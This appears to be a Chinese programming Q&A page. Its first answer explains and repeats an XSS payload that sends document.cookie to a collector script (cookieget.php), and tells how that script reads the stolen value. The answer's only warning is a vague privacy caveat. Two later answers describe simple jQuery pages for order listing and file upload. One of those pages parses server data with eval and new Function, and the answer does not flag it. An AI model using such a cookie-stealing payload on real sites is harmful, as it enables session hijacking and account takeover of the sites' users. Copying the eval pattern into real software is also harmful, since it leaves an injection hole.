使用 <script>window.location.href="http://127.0.0.1/cookieget.php?c="+document.cookie</script> 打cookie
时间: 2024-09-18 10:17:11 浏览: 39
使用 `<script>` 标签和 JavaScript 代码 `window.location.href` 能够通过页面跳转的方式,在当前浏览器窗口中自动加载并传递 `document.cookie` 到指定的 URL,例如 `http://127.0.0.1/cookieget.php`。这里的 `?c=` 参数后面跟着浏览器当前所有的 cookies 作为查询字符串。当用户访问这个链接时,`cookieget.php` 页面将会接收到这些 cookies。
这是JavaScript代码片段的示例:
```html
<script>
window.location.href = "http://127.0.0.1/cookieget.php?c=" + document.cookie;
</script>
```
当你点击这段代码时,浏览器会直接跳转到 `cookieget.php`,并将当前所有 cookies 的值以 `c=...` 形式添加到 URL 查询参数中。在 `cookieget.php` 中,你可以通过 `$GET['c']` 来接收这些 cookie。
需要注意的是,这种方法虽然直观,但在某些场景下可能会引发安全问题,比如用户隐私泄露。因此,通常在处理敏感数据时应谨慎使用。
相关问题
<!DOCTYPE html> <html> <head> <title>订单事件列表</title> <link rel="stylesheet" type="text/css" href="./css/style.css"> <script src="https://cdn.bootcdn.net/ajax/libs/jquery/3.6.0/jquery.min.js"></script> <!-- ajax 传输方式为post --> <script> window.onload = function () { // setInterval(Action) setTimeout(Action, 1000); } Action = function () { $.ajax({ url: "http://127.0.0.1:8088/admApi/getOrder", type: "get", success: function (data) { console.log('data'); console.log(data); // var orders = JSON.parse(data); var obj = new Function("return" + data)();//转换后的JSON对象 var orders = eval(obj); for (var i = 0; i < orders.length; i++) { var order = orders[i]; var username = order.username; var account = order.account; var orderName = order.orderName; var time = order.time; var html = "<tr><td>" + username + "</td><td>" + account + "</td><td>" + orderName + "</td><td>" + time + "</td></tr>"; $("#order-list").append(html); } console.log(data); } }); } // $(document).ready(function(){ // $.ajax({ // url: "http://127.0.0.1:8086/admApi/getOrder", // type: "get", // success: function(data){ // var orders = JSON.parse(data); // for(var i = 0; i < orders.length; i++){ // var order = orders[i]; // var username = order.username; // var account = order.account; // var orderName = order.orderName; // var time = order.time; // var html = "<tr><td>" + username + "</td><td>" + account + "</td><td>" + orderName + "</td><td>" + time + "</td></tr>"; // $("#order-list").append(html); // } // console.log(data); // } // }); // }); </script> </head> <body> <table> <thead> <tr> <th>用户名</th> <th>账号</th> <th>订单名称</th> <th>时间</th> </tr> </thead> <tbody id="order-list"> </tbody> </table> </body> </html>
这段代码是一个使用ajax请求获取订单数据并将其展示在网页上的前端页面代码。其中通过jQuery库中的ajax方法向http://127.0.0.1:8088/admApi/getOrder发送get请求,获取到订单数据后解析为JSON对象,然后循环遍历其中的每个订单并将其数据拼接到html中,最后使用jQuery的append方法将拼接好的html添加到tbody元素中展示出来。同时,页面中也引入了一个style.css文件来控制页面的样式。
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" type="text/css" href="./CSS/index.css"> <script type="text/javascript" src="./js/jquery-3.3.1.js"></script> <title>Document</title> </head> <body> <div class="divclass"> <button onclick="getLogIn()">log in</button> <hr> <input type="file" id="uploadFile" name="uploadFile" /> <button onclick="addFile()" type="submit">提交</button> <hr> <input type="text" id="downloadfilename"> <button onclick="downloadFile()" target="new target">下载</button> </div> </body> <!-- http://127.0.0.1:8082/localTest/upload --> <!-- http://127.0.0.1:8082/localTest/testDownload --> <script> function getLogIn() { window.location.href = "./pages/login.html"; } function downloadFile() { var filename = document.getElementById("downloadfilename").value; //window.open("http://127.0.0.1:8082/localTest/testDownload?filename=" + encodeURI(filename)); window.open("http://127.0.0.1:8088/api/DownloadByCustomer?filename=" + encodeURI(filename)); } function addFile() { var formData = new FormData(); formData.append("file1", document.getElementById('uploadFile').files[0]); $.ajax({ url: 'http://127.0.0.1:8088/admApi/admUpload', type: 'POST', data: formData, // 上传formdata封装的数据包 //dataType: 'JSON', timeout: 10000, cache: false, // 不缓存 processData: false, // jQuery不要去处理发送的数据 contentType: false, // jQuery不要去设置Content-Type请求头 success: function (res) { console.log(res) console.log("上传成功"); return alert("上传成功"); }, error: function (sd) { console.log(sd) console.log("上传失败"); return alert("上传失败"); } }); }; </script> </html>
这是一个 HTML 页面,包含一个按钮和三个输入框。点击按钮会跳转到 login.html 页面,其中一个输入框可以用来上传文件,另一个输入框可以输入文件名,点击下载按钮会下载指定文件名的文件。其中,上传文件的代码使用了 jQuery 的 ajax 方法,将文件数据包装为 FormData 格式上传。下载文件的代码使用了 window.open 方法,将文件名作为参数拼接在 URL 后面进行下载。页面中的地址都是本地地址,需要根据实际情况进行修改。
阅读全文